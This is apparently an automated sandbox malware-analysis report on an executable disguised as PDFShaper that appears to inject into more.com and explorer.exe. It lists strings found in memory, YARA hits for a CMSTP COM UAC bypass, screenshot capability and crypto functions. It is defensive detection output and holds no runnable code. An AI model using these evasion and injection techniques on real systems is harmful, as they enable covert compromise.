Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0L
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0O
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://s2.symcb.com0
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe	String found in binary or memory: http://sha256timestamp.ws.symantec.com/sha256/timestamp
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe	String found in binary or memory: http://sha256timestamp.ws.symantec.com/sha256/timestampNhttps://ca.signfiles.com/TSAServer.aspx
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcd.com0&
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2155388747.00000000011DE000.00000004.00000020.00020000.00000000.sdmp, logioptionsplus_updater.exe, 00000007.00000002.2300803784.00000000011DE000.00000004.00000020.00020000.00000000.sdmp, logioptionsplus_updater.exe, 0000000B.00000002.2718351383.0000000001350000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.aiim.org/pdfa/ns/extension/
Source: logioptionsplus_updater.exe, 00000007.00000002.2300803784.00000000011DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.aiim.org/pdfa/ns/id/
Source: logioptionsplus_updater.exe, 0000000B.00000002.2718351383.0000000001350000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.aiim.org/pdfa/ns/id/&4D
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2155388747.00000000011DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.aiim.org/pdfa/ns/id/ndows.
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2155388747.00000000011DE000.00000004.00000020.00020000.00000000.sdmp, logioptionsplus_updater.exe, 00000007.00000002.2300803784.00000000011DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.aiim.org/pdfa/ns/property#
Source: logioptionsplus_updater.exe, 0000000B.00000002.2718351383.0000000001350000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.aiim.org/pdfa/ns/property#HR
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2155388747.00000000011DE000.00000004.00000020.00020000.00000000.sdmp, logioptionsplus_updater.exe, 00000007.00000002.2300803784.00000000011DE000.00000004.00000020.00020000.00000000.sdmp, logioptionsplus_updater.exe, 0000000B.00000002.2718351383.0000000001350000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.aiim.org/pdfa/ns/schema#
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004A09000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.00000000045BE000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.00000000045BC000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E38000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.000000000517D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.info-zip.org/
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe	String found in binary or memory: http://www.pdfshaper.com/buy.htmlopenU
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe	String found in binary or memory: http://www.pdfshaper.com/download.htmlopen
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe	String found in binary or memory: http://www.pdfshaper.com/update.verU
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe	String found in binary or memory: http://www.pdfshaper.comP
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe	String found in binary or memory: http://www.pdfshaper.comopen
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.symauth.com/cps0(
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.symauth.com/rpa00
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.vmware.com/0
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.vmware.com/0/
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe	String found in binary or memory: http://www.winsoft.skU
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe	String found in binary or memory: http://www.xfa.org/schema/xfa-data/1.0/
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe	String found in binary or memory: http://www.xfa.org/schema/xfa-template/
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe	String found in binary or memory: http://xml.org/sax/properties/declaration-handler
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe	String found in binary or memory: http://xml.org/sax/properties/lexical-handler
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe	String found in binary or memory: https://ca.signfiles.com/TSAServer.aspx
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/cps0%
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe	String found in binary or memory: https://www.winsoft.sk

Contains functionality to record screenshots

Source: C:\Windows\SysWOW64\explorer.exe

14_2_007661F0

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.5Z1WFRMTOXRH6X21Z8NU8.exe.4c60a8f.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 1.2.more.com.4652b57.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 16.2.explorer.exe.5211b57.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0.2.5Z1WFRMTOXRH6X21Z8NU8.exe.4c6168f.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 1.2.more.com.460da8a.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 14.2.explorer.exe.4eccb57.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 7.2.logioptionsplus_updater.exe.115bf58.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 12.2.more.com.4650b57.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 12.2.more.com.460ba8a.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 14.2.explorer.exe.4e87a8a.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0.2.5Z1WFRMTOXRH6X21Z8NU8.exe.4c1b9c2.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 14.2.explorer.exe.4ecd757.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 1.2.more.com.4653757.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 12.2.more.com.4651757.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 16.2.explorer.exe.5212757.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 16.2.explorer.exe.51cca8a.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 7.2.logioptionsplus_updater.exe.115bf58.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen

Contains functionality to call native functions

Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe

Code function: 0_2_00799962 NtQuerySystemInformation,

0_2_00799962

Detected potential crypto function

Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_007661F0	14_2_007661F0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_0076B700	14_2_0076B700
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_007D80EA	14_2_007D80EA
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_007651A0	14_2_007651A0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_0078F3EB	14_2_0078F3EB
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_0079C467	14_2_0079C467
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_00765450	14_2_00765450
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_0078B4B0	14_2_0078B4B0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_007A1679	14_2_007A1679
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_00792930	14_2_00792930
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_007A5A76	14_2_007A5A76
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_007D8A00	14_2_007D8A00
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_007A5B96	14_2_007A5B96
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_0079CC09	14_2_0079CC09
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_007A3DE9	14_2_007A3DE9
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_00764EF0	14_2_00764EF0

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\explorer.exe	Code function: String function: 00789D11 appears 60 times
Source: C:\Windows\SysWOW64\explorer.exe	Code function: String function: 0078A560 appears 50 times
Source: C:\Windows\SysWOW64\explorer.exe	Code function: String function: 00783F40 appears 136 times

PE / OLE file has an invalid certificate

Source: 5Z1WFRMTOXRH6X21Z8NU8.exe

Static PE information: invalid certificate

PE file contains more sections than normal

Source: 5Z1WFRMTOXRH6X21Z8NU8.exe

Static PE information: Number of sections : 11 > 10

Sample file is different than original file name gathered from version info

Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2170108077.00000000055DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs 5Z1WFRMTOXRH6X21Z8NU8.exe
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2164119110.00000000047FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs 5Z1WFRMTOXRH6X21Z8NU8.exe
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamezip.exe( vs 5Z1WFRMTOXRH6X21Z8NU8.exe
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe	Binary or memory string: OriginalFilenamePDFShaper.exe6 vs 5Z1WFRMTOXRH6X21Z8NU8.exe

Uses 32bit PE files

Source: 5Z1WFRMTOXRH6X21Z8NU8.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Yara signature match

Source: 0.2.5Z1WFRMTOXRH6X21Z8NU8.exe.4c60a8f.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 1.2.more.com.4652b57.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 16.2.explorer.exe.5211b57.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0.2.5Z1WFRMTOXRH6X21Z8NU8.exe.4c6168f.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 1.2.more.com.460da8a.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 14.2.explorer.exe.4eccb57.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 7.2.logioptionsplus_updater.exe.115bf58.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 12.2.more.com.4650b57.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 12.2.more.com.460ba8a.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 14.2.explorer.exe.4e87a8a.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0.2.5Z1WFRMTOXRH6X21Z8NU8.exe.4c1b9c2.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
